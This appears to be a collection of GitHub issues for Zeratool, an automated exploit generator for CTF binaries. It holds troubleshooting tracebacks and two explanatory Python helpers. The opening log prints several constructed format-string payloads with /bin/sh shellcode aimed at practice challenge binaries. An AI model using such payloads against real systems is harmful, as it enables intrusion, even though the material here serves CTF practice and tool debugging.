'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack

Suggestion

What do you think about the Vagrant env? I can't install Zeratool correctly.

So I hope you can add one Vagrantfile, thank you a lot.

ERROR: Cannot open 'dbg:///home/panghu/Desktop/Zeratool/challenges/ret' for writing

root@ubuntu:~/Desktop/Zeratool/bin# python zerapwn.py ../challenges/ret
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying RDMSR
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying XGETBV
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying AAD
INFO | 2023-03-14 07:54:10,515 | pyvex.lifting.util.lifter_helper | Trying AAM
INFO | 2023-03-14 07:54:10,528 | main | [+] Checking pwn type...
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze all functions arguments/locals (afva@@@f)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO | 2023-03-14 07:54:10,596 | zeratool.winFunctionDetector | [+] Found win function sym.win
INFO | 2023-03-14 07:54:10,596 | main | [+] Checking for overflow pwn type...
INFO | 2023-03-14 07:54:14,092 | zeratool.simgr_helper | Found vulnerable state.
INFO | 2023-03-14 07:54:14,121 | zeratool.simgr_helper | [+] Vulnerable path found b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00CCCC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
INFO | 2023-03-14 07:54:14,121 | zeratool.simgr_helper | [+] Offset to bytes : 80
INFO | 2023-03-14 07:54:14,121 | main | [+] Getting binary protections
INFO | 2023-03-14 07:54:14,141 | main | [+] Exploiting overflow
ERROR: Cannot open 'dbg:///home/panghu/Desktop/Zeratool/challenges/ret' for writing
Traceback (most recent call last):
  File "/home/panghu/.local/lib/python3.8/site-packages/r2pipe/open_sync.py", line 80, in __init__
    self.process.stdin.write(("?V\n").encode("utf8"))
BrokenPipeError: [Errno 32] Broken pipe

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "zerapwn.py", line 246, in <module>
    main()
  File "zerapwn.py", line 180, in main
    properties["pwn_type"]["results"] = overflowExploiter.exploitOverflow(
  File "/home/panghu/.local/lib/python3.8/site-packages/zeratool/overflowExploiter.py", line 131, in exploitOverflow
    reg_values = getRegValues(binary_name, start_addr)
  File "/home/panghu/.local/lib/python3.8/site-packages/zeratool/radare_helper.py", line 11, in getRegValues
    r2 = r2pipe.open(filename, flags=["-d"])
  File "/home/panghu/.local/lib/python3.8/site-packages/r2pipe/open_sync.py", line 88, in __init__
    raise Exception("ERROR: Cannot open %s" % filename)
Exception: ERROR: Cannot open /home/panghu/Desktop/Zeratool/challenges/ret
root@ubuntu:~/Desktop/Zeratool/bin#

All attempts (including samples) result in "Can not determine vulnerable type"

# python zeratool.py -v challenges/easy_format 
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Found symbolic buffer at position 0 of length 49
[+] Getting binary protections
Cannot analyze at 0x08048430
Cannot analyze at 0x08048430
[+] Found win function main
[-] Can not determine vulnerable type

(Running on Kali 2019.3)

Can not determine vulnerable type from ./sample.sh

I tried to run the sample but got this.

$ ./samples.sh 
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Getting binary protections
[+] Found win function sym.win
[-] Can not determine vulnerable type

Angr 8 and python3 pwntools support

Hi,

It would be nice to support version 8.x of Angr. About pwntools, the "python3-pwntools" package for Python 3 already exists, so it could be updated.

The only problem is that there have been changes in the Angr API and the code needs adapting. Can someone help?

formatDetector.py-Error

handle_connect = p.loader.main_object.get_symbol('handle_connection')

state = p.factory.entry_state(addr=handle_connect.rebased_addr)

  • Error: handle_connect != handle_connection

Format Detector

zerapwn.py ./vuln --format_only

Traceback (most recent call last):
  File "/home/obrad/.local/bin/zerapwn.py", line 246, in <module>
    main()
  File "/home/obrad/.local/bin/zerapwn.py", line 133, in main
    properties["pwn_type"] = formatDetector.checkFormat(
  File "/home/obrad/.local/lib/python3.10/site-packages/zeratool/formatDetector.py", line 81, in checkFormat
    if "input" in end_state.globals.keys():
AttributeError: 'NoneType' object has no attribute 'globals'

Used on picoCTF flag leak challenge
https://play.picoctf.org/practice/challenge/269?category=6&page=1&search=flag%20le

Null bytes in exploit

I noticed that the majority of the exploits generated (by Zeratool, i.e. angr) contain null bytes in them. Does this work for you? AFAIK this will break the exploit and prevent delivering the full payload if the function is expecting a null-terminated input.

(Sorry for asking such a trivial question, but I was wondering how this works with all the null bytes that we see in the generated exploits.)
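An added illustration of the distinction this question turns on (example code written for this page, not part of Zeratool): byte-oriented readers such as read() and fgets() store NUL bytes into the destination buffer like any other byte, so an overflow that happens on that raw copy is not cut short by them, whereas any later C-string operation (strlen, strcpy, printf "%s") stops at the first NUL. The sample input below is constructed here and only mimics the shape of the angr output quoted in this thread; the function names are this example's own.

```python
"""Model how common C input routines treat an input buffer that contains NUL bytes.

Added example for this page, not Zeratool code. It reproduces the C semantics in
Python so that a generated input can be checked offline for the truncation the
question above asks about.
"""

# Constructed sample input (not taken from a real run): the shape of the
# angr-produced input shown in this thread, i.e. NUL padding, a marker value,
# more padding and a few filler bytes. 36 bytes in total.
SAMPLE_INPUT = b"\x00" * 8 + b"\xef\xbe\xad\xde" + b"\x00" * 4 + b"CCCC" + b"\x00" * 16


def stored_by_read(payload: bytes, count: int) -> bytes:
    """read(fd, buf, count) is byte-oriented: NUL is stored like any other byte."""
    return payload[:count]


def stored_by_fgets(payload: bytes, size: int) -> bytes:
    """fgets(buf, size, stream) stores at most size-1 bytes and stops after the
    first newline; NUL bytes are stored, not treated as terminators."""
    chunk = payload[: size - 1]
    newline = chunk.find(b"\n")
    return chunk if newline < 0 else chunk[: newline + 1]


def stored_by_gets(payload: bytes) -> bytes:
    """gets(buf) has no bound; it stops at the first newline (which is discarded)
    but stores NUL bytes, the same NUL behaviour as fgets without a size limit."""
    newline = payload.find(b"\n")
    return payload if newline < 0 else payload[:newline]


def seen_as_c_string(buffer: bytes) -> bytes:
    """What strlen(), strcpy(), strcat() or printf("%s") see in that buffer:
    everything up to, but not including, the first NUL byte."""
    nul = buffer.find(b"\x00")
    return buffer if nul < 0 else buffer[:nul]


def truncation_report(payload: bytes, buf_size: int) -> dict:
    """Summarise how many bytes each path delivers for a given buffer size.

    A payload that relies on bytes past its first NUL survives read()/fgets()
    but is cut short as soon as the program copies it with a string function.
    """
    via_read = stored_by_read(payload, buf_size)
    via_fgets = stored_by_fgets(payload, buf_size)
    return {
        "has_nul": b"\x00" in payload,
        "first_nul": payload.find(b"\x00"),
        "read": len(via_read),
        "fgets": len(via_fgets),
        "strcpy_after_read": len(seen_as_c_string(via_read)),
        "strcpy_after_fgets": len(seen_as_c_string(via_fgets)),
    }


if __name__ == "__main__":
    # For SAMPLE_INPUT the raw readers deliver all 36 bytes while the
    # string-function view is empty, because the very first byte is NUL.
    for key, value in truncation_report(SAMPLE_INPUT, 64).items():
        print("%-20s %s" % (key, value))
```

Running it on the constructed sample shows both sides of the answer: read() and fgets() hand all 36 bytes to the program, while the "strcpy" rows are 0 because the first byte is already NUL. Which row applies depends on how the target program actually reads and copies its input.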

b64decode TypeError: Incorrect padding

I used the sample script, but it failed. The output is the following:
(zeratool) test@ubuntu:~/tools/Zeratool$ python zeratool.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Vulnerable path found '0000000000000000000000000p00000000000000000000000000000000000000\xef\xbe\xad\xde000000000000AAAA000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
[+] Triggerable with STDIN : '0000000000000000000000000p00000000000000000000000000000000000000\xef\xbe\xad\xde000000000000AAAA000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
[+] Getting binary protections
Traceback (most recent call last):
  File "zeratool.py", line 80, in <module>
    main()
  File "zeratool.py", line 61, in main
    properties['win_functions'] = winFunctionDetector.getWinFunctions(args.file)
  File "/home/test/tools/Zeratool/lib/winFunctionDetector.py", line 34, in getWinFunctions
    decoded_value = base64.b64decode(value)
  File "/usr/lib/python2.7/base64.py", line 78, in b64decode
    raise TypeError(msg)
TypeError: Incorrect padding

Anyway, my Ubuntu is 16.04.
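The traceback above shows base64.b64decode() rejecting the value it was handed because the text length is not a multiple of four. An added helper (example code for this page, not Zeratool's own; the function names are this example's) that re-adds the missing '=' padding before decoding and reports values that are not base64 at all instead of aborting the whole scan:

```python
"""Tolerant base64 decoding for values that may have lost their '=' padding.

Added example for this page, not Zeratool code. Python 3's base64.b64decode
raises binascii.Error("Incorrect padding") for such input; the Python 2.7
traceback above shows the same condition surfacing as a TypeError.
"""
import base64
import binascii


def b64decode_padded(value):
    """Decode base64 text, re-adding '=' padding if the producer stripped it.

    Raises ValueError when the text cannot be base64 regardless of padding
    (a length of 1 mod 4 is never valid, nor are characters outside the
    alphabet), so a caller can skip such values instead of crashing.
    """
    if isinstance(value, str):
        value = value.encode("ascii", "strict")
    value = value.strip()
    missing = (-len(value)) % 4
    if missing == 3:
        raise ValueError("length %d is never valid base64" % len(value))
    try:
        # validate=True rejects characters outside the base64 alphabet instead
        # of silently discarding them.
        return base64.b64decode(value + b"=" * missing, validate=True)
    except binascii.Error as exc:
        raise ValueError("not base64: %s" % exc) from exc


def try_b64decode(value):
    """Best-effort variant: return the decoded bytes, or None if undecodable."""
    try:
        return b64decode_padded(value)
    except (ValueError, UnicodeEncodeError):
        return None


def decode_names(values):
    """Decode a list of candidate names, keeping undecodable ones as None so
    that one bad entry does not abort the whole list (the failure mode in the
    traceback above)."""
    return [(v, try_b64decode(v)) for v in values]


if __name__ == "__main__":
    # Constructed samples: "bWFpbg" is base64 for b"main" with its "==" removed,
    # "d2lu" is b"win" and needs no padding, "b" and "not base64!" are unrecoverable.
    for raw, decoded in decode_names(["bWFpbg", "bWFpbg==", "d2lu", "b", "not base64!"]):
        print("%-12r -> %r" % (raw, decoded))
```

Re-adding padding only fixes the case where a producer strips the trailing '='; a value whose length is 1 mod 4, or that contains characters outside the base64 alphabet, is reported as undecodable rather than guessed at.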
